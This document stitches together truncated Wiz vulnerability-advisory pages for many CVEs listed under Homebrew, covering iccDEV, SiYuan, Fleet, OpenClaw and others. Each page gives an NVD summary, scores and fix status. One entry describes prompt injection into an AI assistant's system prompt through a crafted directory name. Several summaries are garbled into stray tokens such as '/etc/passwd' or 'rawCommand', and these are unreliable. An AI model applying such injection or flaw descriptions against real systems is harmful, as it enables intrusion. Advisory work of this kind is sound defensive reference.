CVE-2026-34389 [MEDIUM] CVE-2026-34389 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34389 :
Homebrew vulnerability analysis and mitigation
Fleet is open source device management software. Prior to 4.81.0, Fleet contained an issue in the user invitation flow where the email address provided during invite acceptance was not validated against the email address associated with the invite. An attacker who obtained a valid invite token could create an account under an arbitrary email address while inheriting the role granted by the invite, including global admin. Version 4.81.0 patches the issue.
Source : NVD
## 4.9
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 4.9
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.9
Exp
Wiz
CVE-2026-24412 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-24412 [HIGH] CVE-2026-24412 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24412 :
Homebrew vulnerability analysis and mitigation
iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have aHeap Buffer Overflow vulnerability in the CIccTagXmlSegmentedCurve::ToXml() function. This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2.
Source : NVD
## 8.8
Score
Published January 24, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA
Wiz
CVE-2026-27001 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-27001 [HIGH] CVE-2026-27001 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27001 :
Homebrew vulnerability analysis and mitigation
OpenClaw is a personal AI assistant. Prior to version 2026.2.15, OpenClaw embedded the current working directory (workspace path) into the agent system prompt without sanitization. If an attacker can cause OpenClaw to run inside a directory whose name contains control/format characters (for example newlines or Unicode bidi/zero-width markers), those characters could break the prompt structure and inject attacker-controlled instructions. Starting in version 2026.2.15, the workspace path is sanitized before it is embedded into any LLM prompt output, stripping Unicode control/format characters and explicit line/paragraph separators. Workspace path resolution also applies the same sanitization as defense-in-depth.
Source : N
Wiz
CVE-2025-70968 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-70968 [CRITICAL] CVE-2025-70968 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-70968 :
Homebrew vulnerability analysis and mitigation
FreeImage 3.18.0 contains a Use After Free in PluginTARGA.cpp;loadRLE().
Source : NVD
## 9.8
Score
Published January 14, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
freeimage
Sources
NVD
Alpine 3.11, 3.12, 3.13, 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21, edge Severity CRITICAL No Fix Added at: Jan 24, 2026
Alpine 3.22, 3.23 Severity CRITICAL No Fix Added at: Jan 28, 2026
Debian 11, 14 Severity CRITICAL No Fix Added at: Jan 18, 2026
Debian 12, 13 Sever
Wiz
CVE-2026-26061 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-26061 [HIGH] CVE-2026-26061 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26061 :
Homebrew vulnerability analysis and mitigation
Fleet is open source device management software. Prior to 4.81.0, Fleet contained multiple unauthenticated HTTP endpoints that read request bodies without enforcing a size limit. An unauthenticated attacker could exploit this behavior by sending large or repeated HTTP payloads, causing excessive memory allocation and resulting in a denial-of-service (DoS) condition. Version 4.81.0 patches the issue.
Source : NVD
## 8.7
Score
Published March 27, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18.4
Exploitation Probability (EPSS) 0.1
Affected packages and l
Wiz
CVE-2022-50689 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2022-50689 [MEDIUM] CVE-2022-50689 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50689 :
Homebrew vulnerability analysis and mitigation
Cobian Reflector 0.9.93 RC1 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the password input field. Attackers can paste a large 8000-byte buffer into the password field to trigger an application crash during SFTP task configuration.
Source : NVD
## 6.9
Score
Published December 22, 2025
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
reflector
Sources
NVD
Homebrew Severity MEDIUM No Fix Added at: Jan 01, 2026
## Get a CVE r
Wiz
CVE-2026-26972 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.7
CVE-2026-26972 [MEDIUM] CVE-2026-26972 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26972 :
Homebrew vulnerability analysis and mitigation
download
Source : NVD
## 6.7
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 6.7
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openclaw
Sources
NVD
npm Severity MEDIUM Has Fix Added at: Feb 19, 2026
Homebrew Severity MEDIUM Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Wiz
CVE-2026-26321 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-26321 [HIGH] CVE-2026-26321 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26321 :
Homebrew vulnerability analysis and mitigation
sendMediaFeishu
mediaUrl
/etc/passwd
mediaUrl
2026.2.14
Source : NVD
## 7.5
Score
Published February 19, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openclaw
Sources
NVD
npm Severity HIGH Has Fix Added at: Feb 18, 2026
Homebrew Severity HIGH Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebre
Wiz
CVE-2026-26327 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-26327 [HIGH] CVE-2026-26327 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26327 :
Homebrew vulnerability analysis and mitigation
lanHost
tailnetDns
gatewayPort
gatewayTlsSha256
lanHost
tailnetDns
gatewayPort
gatewayTlsSha256
_openclaw-gw._tcp
auth.token
auth.password
Source : NVD
## 7.1
Score
Published February 19, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openclaw
Sources
NVD
npm Severity HIGH Has Fix Added at: Feb 18, 2026
Homebrew Severity MEDIUM Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your
Wiz
CVE-2026-22861 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-22861 [HIGH] CVE-2026-22861 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22861 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Prior to 2.3.1.2, There is a heap-based buffer overflow in SIccCalcOp::Describe() at IccProfLib/IccMpeCalc.cpp. This vulnerability affects users of the iccDEV library who process ICC color profiles. The vulnerability is fixed in 2.3.1.2.
Source : NVD
## 8.8
Score
Published January 13, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 19.1
Exploitation Probability (EPSS) 0.1
Affected pa
Wiz
CVE-2026-23850 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-23850 [HIGH] CVE-2026-23850 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23850 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. In versions prior to 3.5.4, the markdown feature allows unrestricted server side html-rendering which allows arbitrary file read (LFD). Version 3.5.4 fixes the issue.
Source : NVD
## 8.8
Score
Published January 19, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 25.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
siyuan
github.com/siyuan-note/siyuan/kernel
Sources
NVD
GoLang Severity HIGH Has Fix Added at: Jan 21, 2026
Homebrew Severity HIGH Has Fix Added at: Feb 02, 2026
## G
Wiz
CVE-2026-21674 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.3
CVE-2026-21674 [LOW] CVE-2026-21674 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21674 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below contain a memory leak vulnerability in its XML MPE Parsing Path (iccFromXml). This issue is fixed in version 2.3.1.1.
Source : NVD
## 5.5
Score
Published January 6, 2026
Severity MEDIUM
CNA Score 3.3
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—
Wiz
CVE-2026-25992 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-25992 [HIGH] CVE-2026-25992 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25992 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Prior to 3.5.5, the /api/file/getFile endpoint uses case-sensitive string equality checks to block access to sensitive files. On case-insensitive file systems such as Windows, attackers can bypass restrictions using mixed-case paths and read protected configuration files. This vulnerability is fixed in 3.5.5.
Source : NVD
## 7.5
Score
Published February 10, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
github.com/siyuan-note/siyua
Wiz
CVE-2026-26325 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-26325 [HIGH] CVE-2026-26325 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26325 :
Homebrew vulnerability analysis and mitigation
rawCommand
command[]
system.run
system.run
security=allowlist
ask=on-miss
system.run
rawCommand
command[]
Source : NVD
## 7.2
Score
Published February 19, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openclaw
Sources
NVD
npm Severity HIGH Has Fix Added at: Feb 18, 2026
Homebrew Severity HIGH Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exp
Wiz
CVE-2026-33053 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-33053 [MEDIUM] CVE-2026-33053 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33053 :
Homebrew vulnerability analysis and mitigation
Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the delete_api_key_route() endpoint accepts an api_key_id path parameter and deletes it with only a generic authentication check (get_current_active_user dependency). However, the delete_api_key() CRUD function does NOT verify that the API key belongs to the current user before deletion.
Source : NVD
## 6.1
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Homebrew
LangFlow
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.5
Exploitation Probability (EPSS) N/A
Affected packages a
Wiz
CVE-2026-27488 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-27488 [MEDIUM] CVE-2026-27488 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27488 :
Homebrew vulnerability analysis and mitigation
OpenClaw is a personal AI assistant. In versions 2026.2.17 and below, Cron webhook delivery in src/gateway/server-cron.ts uses fetch() directly, so webhook targets can reach private/metadata/internal endpoints without SSRF policy checks. This issue was fixed in version 2026.2.19.
Source : NVD
## 6.9
Score
Published February 21, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Homebrew
MinimOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openclaw
Sources
NVD
npm Severity MEDIUM Has Fix Added at: Feb 21, 2026
Homebrew Severity HIGH
Wiz
CVE-2026-20726 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-20726 [MEDIUM] CVE-2026-20726 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-20726 :
Homebrew vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.
Source : NVD
## 7.1
Score
Published March 17, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2026-26319 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-26319 [HIGH] CVE-2026-26319 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26319 :
Homebrew vulnerability analysis and mitigation
OpenClaw is a personal AI assistant. Versions 2026.2.13 and below allow the optional @openclaw/voice-call plugin Telnyx webhook handler to accept unsigned inbound webhook requests when telnyx.publicKey is not configured, enabling unauthenticated callers to forge Telnyx events. Telnyx webhooks are expected to be authenticated via Ed25519 signature verification. In affected versions, TelnyxProvider.verifyWebhook() could effectively fail open when no Telnyx public key was configured, allowing arbitrary HTTP POST requests to the voice-call webhook endpoint to be treated as legitimate Telnyx events. This only impacts deployments where the Voice Call plugin is installed, enabled, and the webhook endpoint is reachable from the a
Wiz
CVE-2026-25584 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-25584 [HIGH] CVE-2026-25584 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25584 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.3, there is a stack-buffer-overflow vulnerability in CIccTagFloatNum<>::GetValues(). This is triggered when processing a malformed ICC profile. The vulnerability allows an out-of-bounds write on the stack, potentially leading to memory corruption, information disclosure, or code execution when processing specially crafted ICC files. This issue has been patched in version 2.3.1.3.
Source : NVD
## 7.8
Score
Published February 4, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Rel
Wiz
CVE-2026-30985 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-30985 [HIGH] CVE-2026-30985 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30985 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap-based buffer overflow write in CIccMatrixMath::SetRange() causing memory corruption or crash. This vulnerability is fixed in 2.3.1.5.
Source : NVD
## 7.8
Score
Published March 10, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 16, 2026
## Get a CVE risk assessment
Get a prioritized view o
Wiz
CVE-2025-62403 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-62403 [MEDIUM] CVE-2025-62403 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-62403 :
Homebrew vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.
Source : NVD
## 7.1
Score
Published March 17, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2026-23829 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23829 [MEDIUM] CVE-2026-23829 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23829 :
Homebrew vulnerability analysis and mitigation
RCPT TO
MAIL FROM
\r
\r
\n
Source : NVD
## 5.3
Score
Published January 19, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 76.1
Exploitation Probability (EPSS) 0.9
Affected packages and libraries
mailpit
github.com/axllent/mailpit
Sources
NVD
GoLang Severity MEDIUM Has Fix Added at: Jan 21, 2026
Homebrew Severity MEDIUM Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Seve
Wiz
CVE-2025-68948 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2025-68948 [MEDIUM] CVE-2025-68948 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68948 :
Homebrew vulnerability analysis and mitigation
SiYuan is self-hosted, open source personal knowledge management software. In versions 3.5.1 and prior, the SiYuan Note application utilizes a hardcoded cryptographic secret for its session store. This unsafe practice renders the session encryption ineffective. Since the sensitive AccessAuthCode is stored within the session cookie, an attacker who intercepts or obtains a user's encrypted session cookie (e.g., via session hijacking) can locally decrypt it using the public key. Once decrypted, the attacker can retrieve the AccessAuthCode in plain text and use it to authenticate or take over the session.
Source : NVD
## 6.9
Score
Published December 27, 2025
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Homebr
Wiz
CVE-2025-15564 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2025-15564 [MEDIUM] CVE-2025-15564 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-15564 :
Homebrew vulnerability analysis and mitigation
A vulnerability has been found in Mapnik up to 4.2.0. This vulnerability affects the function mapnik::detail::mod::operator of the file src/value.cpp. The manipulation leads to divide by zero. The attack needs to be performed locally. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published February 7, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.6
Exploitation Probability (EPSS) N/A
Affected packa
Wiz
CVE-2026-30926 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-30926 [HIGH] CVE-2026-30926 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30926 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Prior to 3.5.10, a privilege escalation vulnerability exists in the publish service of SiYuan Note that allows low-privilege publish accounts (RoleReader) to modify notebook content via the /api/block/appendHeadingChildren API endpoint. The endpoint requires only the model.CheckAuth role, which accepts RoleReader sessions, but it does not enforce stricter checks, such as CheckAdminRole or CheckReadonly. This allows remote authenticated publish users with read-only privileges to append new blocks to existing documents, compromising the integrity of stored notes.
Source : NVD
## 7.1
Score
Published March 10, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Ho
Wiz
CVE-2026-27598 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-27598 [HIGH] CVE-2026-27598 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27598 :
Homebrew vulnerability analysis and mitigation
CreateNewDAG
POST /api/v1/dags
Source : NVD
## 7.1
Score
Published February 25, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
github.com/dagu-org/dagu
dagu
Sources
NVD
GoLang Severity HIGH No Fix Added at: Feb 25, 2026
Homebrew Severity MEDIUM No Fix Added at: Mar 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Sco
Wiz
CVE-2026-21689 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-21689 [MEDIUM] CVE-2026-21689 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21689 :
Homebrew vulnerability analysis and mitigation
CIccProfileXml::ParseBasic()
IccXML/IccLibXML/IccProfileXml.cpp
Source : NVD
## 6.5
Score
Published January 7, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV
Wiz
CVE-2026-21428 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2026-21428 [HIGH] CVE-2026-21428 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21428 :
Homebrew vulnerability analysis and mitigation
write_headers
Source : NVD
## 7.7
Score
Published January 1, 2026
Severity HIGH
CNA Score 7.7
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpp-httplib
cpp-httplib-devel
Sources
NVD
Debian 12, 13, 14 Severity HIGH No Fix Added at: Jan 02, 2026
Echo Severity HIGH No Fix Added at: Jan 02, 2026
Homebrew Severity HIGH Has Fix Added at: Jan 08, 2026
Ubuntu 22.04, 24.04, 25.10 Severity MEDIUM No Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud
Wiz
CVE-2026-2653 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-2653 [MEDIUM] CVE-2026-2653 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2653 :
Homebrew vulnerability analysis and mitigation
A security flaw has been discovered in admesh up to 0.98.5. This issue affects the function stl_check_normal_vector of the file src/normals.c. Performing a manipulation results in heap-based buffer overflow. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. It looks like this product is not really maintained anymore.
Source : NVD
## 4.8
Score
Published February 18, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.3
Exploitation Probability (EPSS) N/A
Affected packa
Wiz
CVE-2025-15537 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2025-15537 [MEDIUM] CVE-2025-15537 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-15537 :
Homebrew vulnerability analysis and mitigation
A security vulnerability has been detected in Mapnik up to 4.2.0. This issue affects the function mapnik::dbf_file::string_value of the file plugins/input/shape/dbfile.cpp. Such manipulation leads to heap-based buffer overflow. The attack must be carried out locally. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published January 18, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probabilit
Wiz
CVE-2026-27003 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-27003 [MEDIUM] CVE-2026-27003 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27003 :
Homebrew vulnerability analysis and mitigation
https://api.telegram.org/bot/...
Source : NVD
## 6.9
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openclaw
Sources
NVD
npm Severity MEDIUM Has Fix Added at: Feb 19, 2026
Homebrew Severity MEDIUM Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
Wiz
CVE-2026-21675 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-21675 [CRITICAL] CVE-2026-21675 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21675 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below contain a Use After Free vulnerability in the CIccXform::Create() function, where it deletes the hint. This issue is fixed in version 2.3.1.1.
Source : NVD
## 9.8
Score
Published January 6, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 36.1
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity CRITICAL Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2025-61952 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-61952 [MEDIUM] CVE-2025-61952 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-61952 :
Homebrew vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.
Source : NVD
## 7.1
Score
Published March 17, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
